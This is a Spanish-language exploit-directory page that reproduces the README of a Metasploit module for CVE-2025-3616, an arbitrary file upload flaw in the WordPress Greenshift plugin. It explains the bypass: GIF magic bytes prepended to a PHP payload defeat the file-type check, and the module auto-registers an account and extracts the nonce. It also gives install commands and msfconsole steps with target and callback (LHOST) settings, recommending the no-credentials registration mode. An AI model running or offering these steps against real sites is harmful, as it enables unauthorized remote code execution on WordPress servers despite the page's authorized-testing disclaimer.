Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-3616 — Metasploit module que explota la carga arbitraria de archivos en el plugin Greenshift de WordPress (CVE-2025-3616) para lograr RCE mediante suplantación de MIME, con auto-registro y extracción de nonce. | Kitploit
Herramientas/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Frameworks de ExploitsAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónDesarrollo de Payloads
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Metasploit module que explota la carga arbitraria de archivos en el plugin Greenshift de WordPress (CVE-2025-3616) para lograr RCE mediante suplantación de MIME, con auto-registro y extracción de nonce.

Ver Repositorio
2hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Módulo de Metasploit: Subida de Archivos Arbitraria en el Plugin Greenshift de WordPress (CVE-2025-3616)

Este repositorio contiene un módulo de Metasploit para explotar la CVE-2025-3616, una vulnerabilidad de subida de archivos arbitraria en el plugin Greenshift de WordPress (versiones 11.4 a 11.4.5).

El exploit permite a usuarios autenticados (Suscriptor+) subir archivos arbitrarios, lo que conduce a la ejecución remota de código (RCE). Omite la validación del tipo de archivo del plugin falsificando el tipo MIME mediante los bytes mágicos GIF (GIF89a;).

Características

  • Manejo de autenticación: Permite iniciar sesión con credenciales existentes (USERNAME/PASSWORD).
  • Auto-registro: Incluye una opción REGISTER para registrar automáticamente un nuevo usuario y explotar la vulnerabilidad usando las cookies de sesión recién obtenidas (útil si el registro está habilitado en el objetivo).
  • Extracción de nonce: Extrae automáticamente el nonce wp_rest requerido del panel de administración.
  • Omisión de seguridad: Antepone los bytes mágicos GIF a la carga útil PHP para omitir la verificación de finfo_file().
  • Instalación

    1. Asegúrate de tener instalado Metasploit Framework.

    2. Copia wp_greenshift_file_upload.rb a tu directorio local de módulos:

      root@kitploit:~
      mkdir -p ~/.msf4/modules/exploits/unix/webapp/
      cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
      
    3. Inicia msfconsole y recarga los módulos:

      root@kitploit:~
      msfconsole
      msf6 > reload_all
      

    Uso

    1. Uso de auto-registro (Recomendado)

    Si el registro de usuarios está habilitado en el objetivo, no necesitas credenciales.

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER true
    run
    

    2. Uso de credenciales existentes

    Si ya tienes un usuario válido (Suscriptor o superior):

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER false
    set USERNAME <USER>
    set PASSWORD <PASS>
    run
    

    Opciones

    OpciónRequeridoDescripción
    RHOSTSSíLa dirección del objetivo
    LHOSTSíLa dirección de escucha (tu IP)
    REGISTERNoEstablécelo en true para registrar una nueva cuenta automáticamente (Por defecto: false)
    USERNAMENoNombre de usuario de WordPress (requerido si REGISTER es false)
    PASSWORDNoContraseña de WordPress (requerida si REGISTER es false)
    EMAILNoCorreo electrónico para el registro (opcional, se genera automáticamente si está vacío)

    Descargo de responsabilidad

    Este módulo es solo para fines educativos y pruebas de penetración autorizadas. El uso de este código para atacar objetivos sin consentimiento mutuo previo es ilegal.

    Descargar herramienta